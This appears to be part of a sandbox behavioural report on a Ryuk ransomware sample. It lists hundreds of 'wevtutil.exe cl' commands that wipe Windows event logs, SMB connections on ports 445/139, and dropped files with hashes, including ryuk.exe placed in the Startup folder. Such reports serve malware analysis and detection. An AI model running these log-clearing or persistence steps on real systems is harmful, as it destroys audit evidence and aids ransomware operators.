C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationSrcPrefetch"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppSruProv"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Call"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
NL 154.61.71.51:445 tcp
N/A 10.127.0.1:139 tcp
NL 154.61.71.51:139 tcp
BE 8.238.110.126:80 tcp
US 13.89.179.10:443 tcp
BE 8.238.110.126:80 tcp
BE 8.238.110.126:80 tcp
BE 8.238.110.126:80 tcp
US 204.79.197.200:443 tcp

Files

memory/3956-132-0x0000000000000000-mapping.dmp

memory/4836-133-0x0000000000000000-mapping.dmp

memory/4860-134-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/4976-136-0x0000000000000000-mapping.dmp

memory/3884-137-0x0000000000000000-mapping.dmp

memory/1292-138-0x0000000000000000-mapping.dmp

memory/620-139-0x0000000000000000-mapping.dmp

memory/4192-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/4360-142-0x0000000000000000-mapping.dmp

memory/1252-143-0x0000000000000000-mapping.dmp

memory/4184-144-0x0000000000000000-mapping.dmp

memory/1676-145-0x0000000000000000-mapping.dmp

memory/4268-146-0x0000000000000000-mapping.dmp

memory/3428-147-0x0000000000000000-mapping.dmp

memory/2412-148-0x0000000000000000-mapping.dmp

memory/2344-149-0x0000000000000000-mapping.dmp

memory/1056-150-0x0000000000000000-mapping.dmp

memory/716-151-0x0000000000000000-mapping.dmp

memory/4936-152-0x0000000000000000-mapping.dmp

memory/2296-153-0x0000000000000000-mapping.dmp

memory/1832-154-0x0000000000000000-mapping.dmp

memory/2264-155-0x0000000000000000-mapping.dmp

memory/3892-156-0x0000000000000000-mapping.dmp

memory/3764-159-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1 be9c8af07d3e78226cc893d15058116331d27ed1
SHA256 3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA512 8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1 be9c8af07d3e78226cc893d15058116331d27ed1
SHA256 3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA512 8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

memory/3948-160-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 d80cc59347ae4e43809417a7120d75f5
SHA1 85934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA256 7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512 ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 d80cc59347ae4e43809417a7120d75f5
SHA1 85934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA256 7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512 ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

memory/3856-163-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 933d7ec82a73aca5dd0a05619e82e874
SHA1 f55dbc352e1dc285e514469d841f9eb371afb341
SHA256 cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07
SHA512 2c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0

memory/2996-167-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 d80cc59347ae4e43809417a7120d75f5
SHA1 85934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA256 7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512 ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

C:\ProgramData\hrmlog1

MD5 c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1 be9c8af07d3e78226cc893d15058116331d27ed1
SHA256 3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
